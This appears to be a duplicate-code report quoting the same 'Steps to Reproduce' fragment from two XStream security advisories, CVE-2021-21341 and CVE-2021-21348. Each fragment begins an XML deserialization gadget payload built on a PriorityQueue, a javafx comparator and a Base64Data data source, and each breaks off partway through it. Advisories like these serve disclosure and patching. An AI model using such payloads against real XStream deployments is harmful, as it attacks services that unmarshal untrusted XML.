xstream-distribution/src/content/CVE-2021-21341.html [34:48]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    <h2 id="reproduction">Steps to Reproduce</h2>

	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
	unmarshal it again with XStream:</p>
<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
  &lt;unserializable-parents/&gt;
  &lt;java.util.PriorityQueue&gt;
    &lt;default&gt;
      &lt;size&gt;2&lt;/size&gt;
      &lt;comparator class='javafx.collections.ObservableList$1'/&gt;
    &lt;/default&gt;
    &lt;int&gt;3&lt;/int&gt;
    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
      &lt;dataHandler&gt;
        &lt;dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'&gt;
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



xstream-distribution/src/content/CVE-2021-21348.html [34:48]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    <h2 id="reproduction">Steps to Reproduce</h2>

	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
	unmarshal it again with XStream:</p>
<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
  &lt;unserializable-parents/&gt;
  &lt;java.util.PriorityQueue&gt;
    &lt;default&gt;
      &lt;size&gt;2&lt;/size&gt;
      &lt;comparator class='javafx.collections.ObservableList$1'/&gt;
    &lt;/default&gt;
    &lt;int&gt;3&lt;/int&gt;
    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
      &lt;dataHandler&gt;
        &lt;dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'&gt;
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -